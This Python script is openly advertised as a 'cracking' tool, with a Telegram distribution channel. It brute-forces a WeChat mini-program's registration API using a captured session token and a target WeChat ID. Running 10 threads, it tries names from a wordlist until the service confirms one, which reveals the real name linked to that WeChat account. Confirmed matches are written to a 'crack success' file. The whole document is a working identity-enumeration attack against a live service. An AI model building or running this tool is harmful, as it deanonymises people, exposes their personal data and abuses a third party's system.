import requests
import http.client
import json
import logging
import threading
from queue import Queue
print("欢迎使用小李破解v")
print("本破解v需要自抓ck")
print("发布频道https://t.me/XLNB0000")
print("祝大家天天开心🥳🥳🥳")
print("✅✅✅✅✅✅✅✅")
success_flag = False
stop_flag = False
success_list = [] 


def worker(name_queue, wechat_id, id_value, token):
    global success_flag, stop_flag, success_list
    while not name_queue.empty() and not stop_flag:
        name = name_queue.get()
        url = "https://xjy.geekmatou.cn/xcxgl/api/RegisterMini/registerMiniAppAgain"
        payload = {
            "idname": name,
            "wxuser": wechat_id,
            "id": id_value
        }
        headers = {
            'User-Agent': "Mozilla/5.0 (Linux; Android 15; 2211133C Build/AQ3A.240912.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/130.0.6723.103 Mobile Safari/537.36 XWEB/1300473 MMWEBSDK/20241202 MMWEBID/8144 MicroMessenger/8.0.56.2800(0x2800385E) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64 MiniProgramEnv/android",
            'Content-Type': "application/json",
            'token': token,
            'charset': "utf-8",
           'referer': "https://servicewechat.com/wxba6b8490e69a6a0d/10/page-frame.html"
        }
        try:
            response = requests.post(url, data=json.dumps(payload), headers=headers)
            response_data = response.text
            response_json = json.loads(response_data)

            if response_json["code"] == 1:
                success_flag = True
                success_list.append((wechat_id, name))
                logging.info(f"验证成功✅姓名: {name} 微信 : {wechat_id}")
                stop_flag = True
            elif response_json["code"] == 0:
                logging.info(f"验证失败⛔️姓名: {name} 微信号: {wechat_id}")
            else:
                logging.info(f"未知的响应状态码,姓名: {name} 微信号: {wechat_id}")
        except requests.RequestException as e:
            logging.error(f"发生请求错误: {e},姓名: {name} 微信号: {wechat_id}")
        except json.JSONDecodeError as e:
            logging.error(f"解析响应 JSON 出错: {e},姓名: {name} 微信号: {wechat_id}")

        name_queue.task_done()


def main():
    logging.basicConfig(level=logging.INFO, format='%(message)s')
    print("请选择模式:")
    print("1. 输入文件路径读取姓名进行验证")
    print("2. 自动读取 1.txt 文件进行验证")
    choice = input("请输入模式(1或2):")

    if choice == "2":
        wechat_id = input("请输入微信号: ")
        if not wechat_id:
            logging.error("微信号未输入,请输入微信号。")
            return
        id_value = input("请输入id: ")
        if not id_value:
            logging.error("id 未输入,请输入id。")
            return
        token = input("请输入token: ")
        if not token:
            logging.error("token未输入,请输入token。")
            return

        name_queue = Queue()
        file_path = "1.txt"
        try:
            with open(file_path, 'r', encoding='utf-8') as file:
                names = [line.strip() for line in file.readlines()]
                for name in names:
                    name_queue.put(name)
            logging.info(f"已成功读取文件 {file_path} 开始验证")
        except FileNotFoundError:
        	logging.error(f"{file_path} 文件未找到,请检查文件名和路径。")

    elif choice == "1":
        wechat_id = input("请输入微信号: ")
        if not wechat_id:
            logging.error("微信号未输入,请输入微信号。")
            return
        id_value = input("请输入id: ")
        if not id_value:
            logging.error("id 未输入,请输入id。")
            return
        token = input("请输入token: ")
        if not token:
            logging.error("token未输入,请输入token。")
            return
        file_path = input("请输入文件路径: ")
        name_queue = Queue()
        try:
            with open(file_path, 'r', encoding='utf-8') as file:
                names = [line.strip() for line in file.readlines()]
                for i in range(len(names)):
                    if 'x' in names[i]:
                        names[i] = 'x' * len(names[i])
                    name_queue.put(names[i])
            logging.info(f"已成功读取文件 {file_path},开始 进行验证...")
        except FileNotFoundError:
            logging.error(f"{file_path} 文件未找到,请检查文件名和路径。")
            return
    else:
        logging.error("无效的选择,请输入1或2。")
        return

    threads = []
    for _ in range(10):  # 减少线程数
        t = threading.Thread(target=worker, args=(name_queue, wechat_id, id_value, token))
        t.start()
        threads.append(t)

    name_queue.join()

    for t in threads:
        t.join()

    if success_flag:
        try:
            with open('破解成功.txt', 'w', encoding='utf-8') as file:
                for wechat, name in success_list:
                    file.write(f"{name}{wechat}\n")
            logging.info(f"成功列表已导出到 破解成功.txt,内容: {success_list}")
        except IOError as e:
            logging.error(f"写入文件时出错: {e},无法导出破 解成功列表。")
    else:
        logging.info("没有验证成功的记录。")


if __name__ == "__main__":
    main()

